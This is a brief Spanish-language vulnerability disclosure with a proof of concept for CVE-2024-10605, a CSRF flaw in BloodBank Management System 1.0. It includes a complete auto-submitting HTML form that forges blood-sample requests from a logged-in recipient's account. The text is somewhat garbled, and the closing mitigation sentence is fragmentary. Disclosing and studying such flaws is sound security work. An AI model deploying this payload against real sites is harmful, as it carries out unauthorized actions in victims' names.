
Prueba de concepto para CVE-2024-10605, una vulnerabilidad CSRF en BloodBank Management System 1.0 que permite solicitudes no autorizadas de muestras de sangre.
file/request.phpExiste una Cross Site Request Forgery en este endpoint /file/request.php que permite a un usuario remoto iniciar una solicitud de muestra de sangre en la cuenta de un que ha iniciado sesión, desde la muestra de sangre disponible de un hospital seleccionado.
receptorUna explotación exitosa puede conllevar a acciones no autorizadas en nombre de la víctima. Además, esto podría explotarse visitando sitios web maliciosos con el payload.
A continuación se muestra un ejemplo de un Ataque PoC de CSRF que inicia una solicitud de muestra de sangre desde la cuenta de un receptor con sesión iniciada:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
tokens csrf en su solicitud.